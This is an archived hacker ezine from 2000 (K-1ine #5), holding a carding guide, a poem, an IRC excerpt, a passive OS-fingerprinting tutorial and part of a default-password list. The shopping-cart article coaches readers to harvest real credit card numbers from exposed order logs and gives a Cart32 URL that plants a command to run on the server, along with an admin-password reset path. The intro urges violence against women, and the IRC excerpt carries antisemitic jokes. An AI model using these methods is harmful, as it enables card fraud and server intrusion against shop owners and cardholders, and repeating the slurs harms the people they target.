gemini - kennedy.gemi.dev

💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › K1INE › k-1ine_… captured on 2022-01-08 at 16:17:14.

-=-=-=-=-=-=-

,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*,;*
,;*,;*,;*,;*,;*,;*,;*,;*,; <&#<>.<>./<^>\.<>.<>#&> ;*,;*,;*,;*,;*,;*,;*,fuckup

!;;;;::--==--::--==--::--:[ ]:--::--==--::--==--::;;;;!
:: ::
:: ::
;: ^^.;>.;>.;>.^^.;>.;>.;>^^ K - 1 i n e #5 ^^.;>.;>.;>.^^.;>.;>.;>^^ :;
;; ;:
:: Follow Me Down ::
`:==--::--==--::--==--::--==--::--==--::--==--::-- ]:--::--==--::--==--::--==:'
^ ^
^ Summer 2000 ^
^ ^

: 'A Nettwerked Product' :*
: :*
: :*
: [-] Introduction .......................................... The Clone :*
: (-) Contact Information ................................... The Clone :*
:-=><=--=><=--=><=--=><=--=><=--=><=--=><=--=><=--=><=--=><=--=><=--=>g4p<=:*
:

Featuring...

: (x) 'Shopping Cart Vulnerabilities' ....................... PsychoSpy :*
: (x] 'The Internet Told Me So' ............................. Untoward :*
: (x) 'Passive Fingerprinting' .............................. PsychoSpy :*
: (x) 'Default Password List [Version 3.00]' ................ Eric Knight :*
: (x) '4ncifer Manifest' .................................... 4ncifer :*
: (x) 'Internet Explorer 5 Force Feeding' ................... PsychoSpy :*
: (x) 'RADIO DIRECTION FINDING WITH PCS/GSM MOBILE TERMINALS' Wargames :*
: (x) 'Our First Exploration in a Downtown Drain' ........... Magma/Miklos :*
: (x) 'The Comprehensive Guide to Paytel Canada payphones' .. The Clone :*

: [-] Credits ............................................... The Clone :*
: [-] Shouts ................................................ The Clone :*
: :*
: :*
: :*
: :*

p
e
e
k
a
b
o
o

.
.
.

=-=-
==
-= - . -= = =- -= -
= ., . , -=-=-=-=- =- -= -= =- = = -=
= , . =-

� � ����� ����� ����� � � ����� ���� � � ����� � �
� � � ���� � � � � � ���� ���� ��� ���� � �
� �� � � � � � � � � � � � � � � �
� � ����� � � �� �� ����� � � � � ����� � � . net

== - , , ;; ;: ; ; / ; / ; ; ; ; / ;/;/; / ; / ; ;;

- - = - -= = - .,. ,. -= =-
= = - .,. , - , ,. , =- -=
- -= , , . . . ., =- -= = .=,
, , ., , ., ,

Introduction --

Welcome once again for another edition of K-1ine zine. I am your writer/editor
Mr.T Clone, who is literally melting into his chair as he writes under the
insane Canadian summer heat - 28 degrees (celcius). At the present time I
am wondering to myself why in the hell I'm bothering to do this considering
the circumstances; it must be the heat getting to my half-functional brain
telling myself to do some writing or it's going to shut off completely.

Yes yes yes, it's the summer of 2000. For some of you reading this it probably
feels like just yesterday when you were writing your final exams before
the summer of 69, BUT suddenly without warning the rocks of reality smash you
in the nose and you realize it's the summer of 2000...
the only tests you're going to be taking are those damn prostate exams.
They are neccessary believe it or not. Get your prostate exam done today
or tomorrow if you're a male baby boomer who hasn't thought about this.

-[sidetracked]-

Argh I need a shower - a nice cool shower... mmm... *droowl*

Argh I hate you all.

Enjoy this compilation of files that have been on my site for more than a week.
Enjoy it because I told you to.

For some real fancy dancey writings, go to www.iamhappyblue.com
For some high quality hacking/phreaking documentation,
go to http://phrack.infonexus.com

For wholesome Canadian zine packed full of yummy goodness, keep on reading.

If your girl is on her rag and she's giving you shit,
slap the bitch in the mouth!

-=-=- The Muthafuckin' New Skool; The Clone -=-=-

Contact --

Comments/Questions/Submissions: theclone@nettwerked.net
Check out my site: (Nettwerked) http://www.nettwerked.net
Shoot me an ICQ message: (UIN) 79198218

Shopping Cart Vulnerabilities - by PsychoSpy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sorry about this but it has to be done considering the seriousness
this text could bring along.

************** LEGAL DISCLAIMER ***************

That's correct! It's the legal bull shit we HAVE to go through!
This text is for educational purposes only. Any illegal use of
the information contained in this text is highly discouraged.

The writter of this text takes no responsibilities for any actions
which are taken as a result of the following text.

************** /LEGAL DISCLAIMER ***************

Well here comes yet another text for me! I'm just in one of those
writing moods right now.

So, you want some credit cards to card stuff with huh? And now a days
with the online transactions systems that they have in place, the
credit card generators just don't work anymore! They actually verify
the credit card on an online database to make sure everything is
correct! Damn eh!

Looking for a solution to this problem? Well my friend, I've got it
for you. Using the methods I will detail in this text, I have gotten
over 3,000 Credit Card numbers in less than 2 hours! Mind you I
usually just trade them to people for software, favours etc. it's
still kinda cool.

So, we've all seen those small ma and pa style of online stores, right?
They have ALL got some sort of Shopping Cart type of CGI script, which
is almost always designed by some guy who knows nothing about security
and barely knows how to password protect.

The biggest problem with these sites is that the programmers don't have
a clue what world readable means. So, what ends up happening is that
credit card numbers are left in directories, and files which are, duh,
world readable, and, in many cases, un-encrypted.

There are also some problems with a couple programs which allow anyone
to change the administrators password without knowing the original one
(administration password for the scripts).

So, on we go into the details of some different scripts and how we can
access the credit card numbers (along with address, zip, phone# etc.)

Listed at the end of this text are the various scripts which have been
found to set transaction (order) log files to a default of world
readable.

So, the first attack I will outline is for the sites with the order log
being world readable problem. Here's what you do to find tons of credit
cards quickly.

1. Go to your favourite search engine
2. Type in the executable name, exposed directory name, or any other
exposed files (like the order logs themselves)
3. Once the search pops up weed through these sites
4. If you type in an executable name, then once you're at the executable,
erase the executable name, and insert the exposed directory, and order
log.
OR
If you searched for the order log than it's right there
OR
If you searched for the exposed directory, type in the name of the order
log.
5. Save the order log to your hard drive, or any other storage device and you
have REAL WORKING credit cards to use for whatever you please!
6. DON'T BE STUPID! OR YOU WILL GET CAUGHT! Excercise EXTREME caution if you
purchase anything with these. In fact, I HIGHLY suggest you DON'T.

The other attack is one that is specific to the WebCart32 program which is used
by many small-medium, and even some large, sites.

Search for any of these sites to gain targets. Than once you've found a site
go to the undocumented URLs of:
http://charon/scripts/cart32.exe/cart32clientlist

This will give you a list of usernames and passwords for Cart32 Administrator
access to different clients on the server (NOTE: A client is basically a
shopping site). Mind you these passwords are hashed, but can still be
used in a creative way. An example of this is to embed the hashed password
into a specially crafter URL that would allow the attacker to prime the
server to run an arbitrary command when an order is confirmed:

http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab
&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a
&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program
&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

The above URL would set the cart's properties to spawn a shell, perform a
directory listing and pipe the output to a file called file.txt on the
root of the C: drive when an order is confirmed. After doing this, the
attacker would then create an order and confirm it, thus executing the
command (NOTE: This specific URL would not work on any webserver, you need
to replace the password details and client info with the one for the site
you're working on, I think you get the idea).

The second vulnerability in this sopping cart system is that you can change
the Admin password for the script, without knowing the original.
This is done with another undocumented file at:
http://charon/scripts/c32web.exe/ChangeAdminPassword

Is that crazy stuff or what? I'm sorry, but this programmer must have been
COMPLETELY out to lunch when he programmed this. Either that or he wanted
one hell of a lot of shopping sites to be at his whim.

Anyways, here's the list of known shopping carts with the world readable order log problem.

I am sure there are more out there, and I'm sure some of these have been fixed.
Either way, there are still TONS of vulnerable sites out there.

Selena Sol's WebStore 1.0 http://www.extropia.com/
Platforms: Win32 / *Nix (Perl5)
Executable: web_store.cgi
Exposed Directory: Admin_files
Exposed Order info: Admin_files/order.log
Status: Commercial ($300)/ Demo available.
PGP Option available?: Yes

Order Form v1.2 http://www.io.com/~rga/scripts/cgiorder.html
Platforms: Win32 / *Nix (Perl5)
Executable: ?
Exposed Directory: Varies, commonly "Orders" "order" "orders" etc..
Exposed Order Info: order_log_v12.dat (also order_log.dat)
Status: Shareware ($15/$25 registration fee)
PGP Option available?: Unknown.

Seaside Enterprises EZMall 2000 http://www.ezmall2000.com/
Platforms: Win32 / *Nix (Perl5)
Executable: mall2000.cgi
Exposed Directory: mall_log_files
Exposed Order Info: order.log
Status: Commercial ($225.00+ options)
PGP Option Available?: YES

QuikStore http://www.quikstore.com/
Platforms: Win32 / *Nix (Perl5)
Executable: quikstore.cgi
Exposed Order info: quikstore.cfg* (see note)
Status: Commercial ($175.00+ depending on options)
PGP Option Available?: Unknown.

NOTE: Although the order information itself is secured behind an htaccess
name/pwd pair, the config file is not. The config file is world readable,
and contains the CLEAR TEXT of the ADMINS user id and password
- rendering the entire shopping cart vulnerable to an intruder.
QuikStore's "password protected Online Order Retrieval System" can be
wide open to the world. (Armed with the name and pwd, the web visitor
IS the administrator of the shopping cart, and can view orders, change
settings and order information - the works.)

PDGSoft's PDG Shopping Cart 1.5 http://www.pdgsoft.com/
Platforms: Win32 / *Nix (C/C++(?))
Executable: shopper.cgi
Exposed Directory: PDG_Cart/ (may differ between installs)
Exposed Order info: PDG_Cart/order.log
Exposed Config info: PDG_Cart/shopper.conf (see note)
Status: Commercial ($750+ options)
PGP Option Available?: Unknown. (Couldn't get a yes or no outta them)

NOTE: if they renamed the order log, shopper.conf will tell you where
it's at and what it was named - worse, shopper.conf exposes the clear
text copy of Authnet_Login and Authnet_Password, which gives you full
remote administrative access to the cart. shopper.conf is world
readable and totally unsecured.

Mercantec's SoftCart http://www.mercantec.com/
Platform: Win32 (*Nix?)
Executable: SoftCart.exe (version unknown)
Exposed Directory: /orders and /pw
Exposed Order Info: Files ending in "/orders/*.olf"
Exposed Config Info: /pw/storemgr.pw
(user ID and encrypted PW for store mgr?)
PGP Option Available?: Unknown

Mountain Network Systems Inc. http://www.mountain-net.com
Platform: ?
Exposed Directories: /config, /orders (and others. They're all listed in
config-file)
Exposed Order Info: orders.txt
Exposed Config Info: mountain.cfg
PGP Option Available?: Unknown
Status: Commercial, ranging from $399 to $4650.

Cybercash 2.1.4 - http://www.cybercash.com
Platforms: Sparc?
Exposed directory: /smps-2.1.4-solaris-sparc/
Exposed order info: Several files, as far as I can see.
Many are located in the /db/credit directory.
Whats worse: Exposed admin-password and configuration-files: admin.pw and
admin.conf.
Status: commercial.

Perlshop

Version?
Platforms?
Executable file: perlshop.cgi
Exposed directory: /store/customers/, /store/temp_customers/
Exposed orderinfo: Several files, eight-digit numbered names.
Status: adverware. Only requirement is to display a "powered by perlshop"
- logo on page.

Well then, this is the end of another FINE file created by PsychoSpy
(if I do say so myself).

I hope this file is useful to someone out there, and if anyone has any
questions about this or any of my other files, please do not hesitate to
contact me. My contact info is below, and you can almost always catch me
at irc.2600.net #2600ca.

Anyways, greet'z go out to the usual people, The Clone, Enoch_Root, and all
the guys at #2600ca and who are in the Canadian scene.
Keep up the good work! Hail Non-Existent Crew!

-- PsychoSpy
PsychoSpy@softhome.net
ICQ#: 5057653

---

-=-=-=-

You can close your windows
lock your doors
leave me leaning on widows
sucking on whores

I know that ugly men in beautiful ties
can fool you with their business card lives
allow your finger into their pies
hide you from their wives

The internet told me so,
and with a silly buffer overflow
I know where you were last night
that's right

You can call it done
say you never loved me
that we had our fun
and that was all it was meant to be
and that was all I was meant to be

but I've seen your personal emails
business men fetish she-males
selling you amongst themselves retail
I know you in perfect bitmap detail

the internet told me so
and with a silly buffer overflow
I know where you were last night
that's right
I know who you were last night.

-untoward

---

<seuss> poor jew-spotting technique, Alan. Slavic jews lack any distinguishing facial features.
<theclone> Hitler must of had a tough time with them Slavic jews
<seuss> Man... I sound like some sort of neo-nazi DIY racewar pamphlet.

Passive Fingerprinting - By PsychoSpy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So, here's the scenario. You found this sweet server that
you want to get into. Do you just jump right in and start
trying things? I sure hope not! Your first task should be
to gather information about the server. Unfortunately a lot
of the time when we do this the server figures out what
we're doing, and starts to keep tabs on us before we can even
get started, causing some serious misfortune to many a hacker.

Is there a solution? Sure there is! What's the solution you ask?
The solution is Passive Fingerprinting. With passive fingerprinting
you can ID a remote host, without them knowing!

So, now you want to know how to do. Well, I guess that's the whole
point to this text so here we go!

With this method you can determine the operating system and a few
other characteristics of the remote host using nothing more then
sniffer traces. Although it's not 100% accurate, you can get
surprisingly good results. A proof of concept tool based on some of
the concepts which I'll talk about in this text, was developed by
Craig Smith. Also, the subterrain crew has developed siphon, a passive
port mapping and OS fingerprinting tool.

Traditionally, fingerprinting of Operating Systems has been accomplished
by active tools like queso and nmap. These tools work on the principle that
every OS's IP stack has it's own characteristics and idiosyncrasies. i.e.
different operating system respond differently to a variety of malformed
packets. All that has to be done it to build a database on how the different
OS's respond to the different malformed packets. Once this has been done,
to determine the OS of a remote host/server all one has to do is send it a
variety of malformed packets, figure out how it responds, and then compare
the responses to those in the database.

Fyodor's nmap is tool of choice when using this methodology, he has also
written a highly detailed and interesting paper on this.

Now on to passive fingerprinting. Passive fingerprinting follows the same
general concept but is implemented differently. Passive fingerprinting is
based on sniffer traces from the remote system. Instead of actively
querying the remote system, all one needs to do is capture packets sent
to and from the remote system. Based on the sniffer traces of these packets,
you can determine the OS of the remote system.
Exactly as is done in active fingerprinting, passive is based on the idea
that every OS's IP stack has it's own characteristics. By analyzing these
sniffer traces and IDing these differences, you can (fairly accurately)
determine the OS of the remote system.

Now you're asking what the signatures in the packets we look at are.
So, we'll answer that now. There are four areas that we will look at to
figure out what OS is being used. There are more that can be used, but
these are the most used and basic.

- TTL - This is what the OS sets the Time To Live on the outbound packet
- Windows Size - This is what the OS sets the Window Size at. (duh!)
- DF - Does the OS set the Don't Fragment bit?
- TOS - Does the OS set the Type of Service? If so, to what?

By analyzing these areas of a packet, you might be able to determine the
remote OS. This method is not 100% accurate, and works better on some
OS's than others. No single signature can reliably tell you the remote OS.
However, by look at several signatures and combining all of them, you can
significantly increase the accuracy of IDing the remote system.

Just in case you don't completely get it yet, and would like it, I have
included an example. Below is the sniffer trace of a system sending a packet.
This system launched a mountd exploit against a, so I want to learn more
about it. Yeah I know it's not a server we're attacking but it's the best
example I could find. Let's pretend it's a server we're going to attack though.
Obviously we don't want to finger or nmap the box because that would give
us away immediately. Instead, I want to study the information passively.
This signature was captured using snort (a great sniffer.)

04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257
***F**A* Seq: 0x9DD90553 Ack: 0xE3C65D7 Win: 0x7D78

Based on our 4 criteria, we identify the following:
* TTL: 45
* Window Size: 0x7D78 (or 32120 in decimal)
* DF: The Don't Fragment bit is set
* TOS: 0x0

Since we now have this information, we compare this to a database of
signatures. First, we take a look at the TTL used by the remote system.
From the trace above, as you can see, the TTL was set to 45.
This means that it most likely went through 19 hops to reach us, so the
original TL was set to 64.

Based on this TTL, the box seems to be Linux or FreeBSD.
The TTL is confirmed by doing a traceroute to the system. Obviously we're
concerned that the remote box will detect us, so we set our traceroute
time-to-live to be one or two hops less then the remote most (-m option).
For example in this case we would do a traceroute to the remote host,
but using only 18 hops. This gives to the path info, without actually touching
the remote system.

What next? We move on and compare the Window Size. The window size is another
effective tool, more specifically what Windows Size was used and how often the
size changes. In the example signature, we see it set at 0x7D78, which is
a default Window Size used in Linux. As another point, Linux, FreeBSD,
and Solaris tend to keep the same Window Size for a whole session.
However, Cisco Routers and Micro$oft Windows/NT Window Sizes are constantly
changing. It has been found that Window Size is more accurate if taken into
effect after the initial three-way handshake. For more info on Window Size,
grab a copy of "TCP/IP Illustrated Volume 1" (a GREAT book if your interested
in learning more about networking) in Chapter 20.

Unfortunately the DF bit has very little value to us. Most systems use the DF
bit set so we're somewhat FUBAR on that account. But, it does make it somewhat
easier to ID the few systems that do not use the DF flag (examples are SCO
and OpenBSD).

One thing to remember is that, just like Active Fingerprinting,
Passive Fingerprinting has a few limitations. The first is that applications
that build their own packets, will not use the same signatures as the OS.
Another is that it is pretty easy for a remote system to adjust the TTL,
Window Size, DF, and TOS settings on the packets.

As was said earlier, we are not limited to the four signatures which we
discussed earlier. There are others that can be used, such as TCP or IP
options, initial sequence numbers, and IP Identification numbers.
As an example, Cisco routers tend to start IP Ident numbers at 0, instead of
randomly assigning them.

Another idea is that ICMP payloads can be used. Max Vision discusses using
ICMP payload type or TCP options for remote host identification.
Microsoft ICMP Request payloads are alphabetic, but Solaris or Linux ICMP
Request payloads have alphabetic and symbolic characters.

Passive fingerprinting is also a tool that servers will use to figure out
who/what/where you are while making an attack if you aren't so stealthy.

As a conclusion all I can say is that as hackers we need every tool available
to us to keep us in the shadows. Why broadcast what we're trying to do to
the servers we're attacking if we can keep them in the dark, and keep
ourselves in a stealth like manner.

Greet'z go out to The Clone (YOU ROCK!!) and Enoch_Root.

This has been yet another fine production of the Non-Existent Crew (WE'RE
ALL CANADIAN EH!! ;-)

-- PsychoSpy
PsychoSpy@softhome.net
ICQ#: 5057653

07.15.00

---

Default Password List
Version 3.00 Maintained by Eric Knight (knight@securityparadigm.com)
Last Update: July 6th, 2000

Updates Available at: http://www.securityparadigm.com/defaultpw.htm
Protocol can be any network protocol name, or CONSOLE for requiring
physical access or MULTI meaning any console connection

Manufacturer Product Revision Protocol User ID Password Access Level

Comment
3COM Office Connect ISDN Routers 5x0 Telnet? n/a PASSWORD Admin
3COM adm (none)
3COM admin synnet
3COM debug synnet
3COM manager manager
3COM monitor monitor
3COM read synnet
3COM security security
3COM tech tech
3COM write synnet
Advanced Integration BIOS Console n/a Advance Admin
AMI PC BIOS Console n/a AM Admin
AMI PC BIOS Console n/a AMI Admin
AMI PC BIOS Console n/a A.M.I Admin
AMI PC BIOS Console n/a AMI_SW Admin
AMI PC BIOS Console n/a AMI?SW Admin
AMI PC BIOS Console n/a aammii Admin
AMI PC BIOS Console n/a AMI!SW Admin
AMI PC BIOS Console n/a AMI.KEY Admin
AMI PC BIOS Console n/a AMI.KEZ Admin
AMI PC BIOS Console n/a AMI~ Admin
AMI PC BIOS Console n/a AMIAMI Admin
AMI PC BIOS Console n/a AMIDECOD Admin
AMI PC BIOS Console n/a AMIPSWD Admin
AMI PC BIOS Console n/a amipswd Admin
AMI PC BIOS Console n/a AMISETUP Admin
AMI PC BIOS Console n/a BIOSPASS Admin
AMI PC BIOS Console n/a CMOSPWD Admin
AMI PC BIOS Console n/a HEWITT RAND Admin
Amptron BIOS Console n/a Polrty Admin
AST BIOS Console n/a SnuFG5 Admin
AT&T 3B2 Firmware Console n/a mcp Admin
Autodesk Autocad Multi autocad autocad User
AWARD BIOS Console n/a Award Admin
AWARD BIOS Console n/a AWARD_SW Admin
AWARD BIOS Console n/a SW_AWARD Admin
AWARD BIOS Console n/a AWARD?SW Admin
AWARD BIOS Console n/a lkwpeter Admin
AWARD BIOS Console n/a LKWPETER Admin
AWARD BIOS Console n/a j262 Admin
AWARD BIOS Console n/a j256 Admin
AWARD BIOS Console n/a ?award Admin
AWARD BIOS Console n/a 01322222 Admin
AWARD BIOS Console n/a 256256 Admin
AWARD BIOS Console n/a 589589 Admin
AWARD BIOS Console n/a 589721 Admin
AWARD BIOS Console n/a admin Admin
AWARD BIOS Console n/a alfarome Admin
AWARD BIOS Console n/a aLLy Admin
AWARD BIOS Console n/a aPAf Admin
AWARD BIOS Console n/a award Admin
AWARD BIOS Console n/a AWARD SW Admin
AWARD BIOS Console n/a award.sw Admin
AWARD BIOS Console n/a award_? Admin
AWARD BIOS Console n/a award_ps Admin
AWARD BIOS Console n/a AWARD_PW Admin
AWARD BIOS Console n/a awkward Admin
AWARD BIOS Console n/a BIOS Admin
AWARD BIOS Console n/a biosstar Admin
AWARD BIOS Console n/a biostar Admin
AWARD BIOS Console n/a CONCAT Admin
AWARD BIOS Console n/a condo Admin
AWARD BIOS Console n/a CONDO Admin
AWARD BIOS Console n/a CONDO, Admin
AWARD BIOS Console n/a djonet Admin
AWARD BIOS Console n/a efmukl Admin
AWARD BIOS Console n/a g6PJ Admin
AWARD BIOS Console n/a h6BB Admin
AWARD BIOS Console n/a HELGA-S Admin
AWARD BIOS Console n/a HEWITT RAND Admin
AWARD BIOS Console n/a HLT Admin
AWARD BIOS Console n/a j09F Admin
AWARD BIOS Console n/a j322 Admin
AWARD BIOS Console n/a j64 Admin
AWARD BIOS Console n/a lkw peter Admin
AWARD BIOS Console n/a lkwpeter Admin
AWARD BIOS Console n/a PASSWORD Admin
AWARD BIOS Console n/a SER Admin
AWARD BIOS Console n/a setup Admin
AWARD BIOS Console n/a SKY_FOX Admin
AWARD BIOS Console n/a SWITCHES_SW Admin
AWARD BIOS Console n/a Sxyz Admin
AWARD BIOS Console n/a SZYX Admin
AWARD BIOS Console n/a t0ch20x Admin
AWARD BIOS Console n/a t0ch88 Admin
AWARD BIOS Console n/a TTPTHA Admin
AWARD BIOS Console n/a TzqF Admin
AWARD BIOS Console n/a wodj Admin
AWARD BIOS Console n/a ZAAADA Admin
AWARD BIOS Console n/a zbaaaca Admin
AWARD BIOS Console n/a zjaaadc Admin
Axis NETCAM 200/240 root pass
Bay Networks Router Manager (none) Admin
Bay Networks Router User (none) User
Bay Networks SuperStack II security security Admin
Bay Networks Switch 350T n/a NetICs Admin
Biostar BIOS Console n/a Biostar Admin
Biostar BIOS Console n/a Q54arwms Admin
Breezecom Breezecom Adapters 4.x n/a Super
Breezecom Breezecom Adapters 3.x n/a Master
Breezecom Breezecom Adapters 2.x n/a laflaf
Cayman Cayman DSL n/a (none) Admin
Cisco IOS cisco cisco
Cisco IOS enable cisco IOS technically has no "default pw'
Cisco IOS 2600 series n/a c but these are common misconfigurations
Cisco IOS n/a cc
Cisco IOS n/a cisco
Cisco IOS n/a Cisco router
Cisco CiscoWorks 2000 guest (none) User
Cisco CiscoWorks 2000 admin cisco Admin
Cisco ConfigMaker cmaker cmaker Admin
Compaq BIOS n/a Compaq Admin
Concord BIOS n/a last Admin
Crystalview OutsideView 32 Crystal Admin
CTX International BIOS n/a CTX_123 Admin
CyberMax BIOS n/a Congress Admin
Daewoo BIOS n/a Daewuu Admin
Datacom BSASX/101 n/a letmein Admin
Daytek BIOS n/a Daytec Admin
Dell BIOS n/a Dell Admin
Develcon Orbitor Default Console n/a BRIDGE Admin
Develcon Orbitor Default Console n/a password Admin
Dictaphone ProLog NETOP (none)
Dictaphone ProLog NETWORK NETWORK
Dictaphone ProLog PBX PBX
Digicorp Router n/a BRIDGE Admin
Digicorp Router n/a password Admin
Digital Equipment BIOS n/a komprie Admin
Digital Equipment DEC-10 1 syslib Admin
Digital Equipment DEC-10 1 operator Admin
Digital Equipment DEC-10 1 manager Admin
Digital Equipment DEC-10 2 maintain Admin
Digital Equipment DEC-10 2 syslib Admin
Digital Equipment DEC-10 2 manager Admin
Digital Equipment DEC-10 2 operator Admin
Digital Equipment DEC-10 30 games User
Digital Equipment DEC-10 5 games User
Digital Equipment DEC-10 7 maintain User
Digital Equipment DecServer n/a ACCESS Admin
Digital Equipment DecServer n/a SYSTEM Admin
Digital Equipment IRIS Multi accounting accounting Admin
Digital Equipment IRIS Multi boss boss Admin
Digital Equipment IRIS Multi demo demo User
Digital Equipment IRIS Multi manager manager Admin
Digital Equipment IRIS Multi PDP11 PDP11 User
Digital Equipment IRIS Multi PDP8 PDP8 User
Digital Equipment IRIS Multi software software User
Digital Equipment RSX 1,1 SYSTEM Admin
Digital Equipment RSX BATCH BATCH User
Digital Equipment RSX SYSTEM MANAGER Admin
Digital Equipment RSX SYSTEM SYSTEM Admin
Digital Equipment RSX USER USER User
Digital Equipment Terminal Server Port 7000 n/a access User
Digital Equipment Terminal Server Port 7000 n/a system Admin
Digital Equipment VMS Multi ALLIN1 ALLIN1
Digital Equipment VMS Multi ALLIN1MAIL ALLIN1MAIL
Digital Equipment VMS Multi ALLINONE ALLINONE
Digital Equipment VMS Multi BACKUP BACKUP
Digital Equipment VMS Multi DCL DCL
Digital Equipment VMS Multi DECMAIL DECMAIL
Digital Equipment VMS Multi DECNET DECNET
Digital Equipment VMS Multi DECNET NONPRIV
Digital Equipment VMS Multi DECNET DECNET
Digital Equipment VMS Multi DEFAULT USER
Digital Equipment VMS Multi DEFAULT DEFAULT
Digital Equipment VMS Multi DEMO DEMO
Digital Equipment VMS Multi FIELD FIELD
Digital Equipment VMS Multi FIELD SERVICE
Digital Equipment VMS Multi FIELD TEST
Digital Equipment VMS Multi FIELD DIGITAL
Digital Equipment VMS Multi GUEST GUEST
Digital Equipment VMS Multi HELP HELP
Digital Equipment VMS Multi HELPDESK HELPDESK
Digital Equipment VMS Multi HOST HOST
Digital Equipment VMS Multi HOST HOST
Digital Equipment VMS Multi INFO INFO
Digital Equipment VMS Multi INGRES INGRES
Digital Equipment VMS Multi LINK LINK
Digital Equipment VMS Multi MAILER MAILER
Digital Equipment VMS Multi MBMANAGER MBMANAGER
Digital Equipment VMS Multi MBWATCH MBWATCH
Digital Equipment VMS Multi NETCON NETCON
Digital Equipment VMS Multi NETMGR NETMGR
Digital Equipment VMS Multi NETNONPRIV NETNONPRIV
Digital Equipment VMS Multi NETPRIV NETPRIV
Digital Equipment VMS Multi NETSERVER NETSERVER
Digital Equipment VMS Multi NETSERVER NETSERVER
Digital Equipment VMS Multi NETWORK NETWORK
Digital Equipment VMS Multi NEWINGRES NEWINGRES
Digital Equipment VMS Multi NEWS NEWS
Digital Equipment VMS Multi OPERVAX OPERVAX
Digital Equipment VMS Multi POSTMASTER POSTMASTER
Digital Equipment VMS Multi PRIV PRIV
Digital Equipment VMS Multi REPORT REPORT
Digital Equipment VMS Multi RJE RJE
Digital Equipment VMS Multi STUDENT STUDENT
Digital Equipment VMS Multi SYS SYS
Digital Equipment VMS Multi SYSMAINT SYSMAINT
Digital Equipment VMS Multi SYSMAINT SERVICE
Digital Equipment VMS Multi SYSMAINT DIGITAL
Digital Equipment VMS Multi SYSTEM SYSTEM
Digital Equipment VMS Multi SYSTEM MANAGER
Digital Equipment VMS Multi SYSTEM OPERATOR
Digital Equipment VMS Multi SYSTEM SYSLIB
Digital Equipment VMS Multi SYSTEST UETP
Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST_CLIG
Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST
Digital Equipment VMS Multi TELEDEMO TELEDEMO
Digital Equipment VMS Multi TEST TEST
Digital Equipment VMS Multi UETP UETP
Digital Equipment VMS Multi USER PASSWORD
Digital Equipment VMS Multi USERP USERP
Digital Equipment VMS Multi VAX VAX
Digital Equipment VMS Multi VMS VMS
Dynix Library Systems Dynix circ <social sec #> User
Dynix Library Systems Dynix LIBRARY (none) User
Dynix Library Systems Dynix SETUP (none) Admin
Efficient Speedstream DSL n/a admin Admin
Enox BIOS Console n/a xo11nE Admin
Epox BIOS Console n/a central Admin
Ericsson Ericsson Acc netman netman
Flowpoint Flowpoint DSL admin admin Admin
Freetech BIOS Console n/a Posterie Admin
Galacticomm Major BBS Multi Sysop Sysop Admin
Hewlett-Packard HP 2000/3000 MPE/xx ADVMAIL HPOFFICE,DATA
Hewlett-Packard HP 2000/3000 MPE/xx ADVMAIL HP
Hewlett-Packard HP 2000/3000 MPE/xx FIELD SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx FIELD MGR
Hewlett-Packard HP 2000/3000 MPE/xx FIELD SERVICE
Hewlett-Packard HP 2000/3000 MPE/xx FIELD MANAGER
Hewlett-Packard HP 2000/3000 MPE/xx FIELD HPP187,SYS
Hewlett-Packard HP 2000/3000 MPE/xx FIELD LOTUS
Hewlett-Packard HP 2000/3000 MPE/xx FIELD HPWORD,PUB
Hewlett-Packard HP 2000/3000 MPE/xx FIELD HPONLY
Hewlett-Packard HP 2000/3000 MPE/xx HELLO MANAGER.SYS
Hewlett-Packard HP 2000/3000 MPE/xx HELLO MGR.SYS
Hewlett-Packard HP 2000/3000 MPE/xx HELLO FIELD.SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx HELLO OP.OPERATOR
Hewlett-Packard HP 2000/3000 MPE/xx MAIL MAIL
Hewlett-Packard HP 2000/3000 MPE/xx MAIL REMOTE
Hewlett-Packard HP 2000/3000 MPE/xx MAIL TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx MAIL HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx MAIL MPE
Hewlett-Packard HP 2000/3000 MPE/xx MANAGER TCH
Hewlett-Packard HP 2000/3000 MPE/xx MANAGER SYS
Hewlett-Packard HP 2000/3000 MPE/xx MANAGER SECURITY
Hewlett-Packard HP 2000/3000 MPE/xx MANAGER ITF3000
Hewlett-Packard HP 2000/3000 MPE/xx MANAGER HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx MANAGER COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx MANAGER TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx MGE VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx MGE VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx MGR SYS
Hewlett-Packard HP 2000/3000 MPE/xx MGR CAROLIAN
Hewlett-Packard HP 2000/3000 MPE/xx MGR VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx MGR XLSERVER
Hewlett-Packard HP 2000/3000 MPE/xx MGR SECURITY
Hewlett-Packard HP 2000/3000 MPE/xx MGR TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx MGR HPDESK
Hewlett-Packard HP 2000/3000 MPE/xx MGR CCC
Hewlett-Packard HP 2000/3000 MPE/xx MGR CNAS
Hewlett-Packard HP 2000/3000 MPE/xx MGR WORD
Hewlett-Packard HP 2000/3000 MPE/xx MGR COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx MGR ROBELLE
Hewlett-Packard HP 2000/3000 MPE/xx MGR HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx MGR HPONLY
Hewlett-Packard HP 2000/3000 MPE/xx MGR HPP187
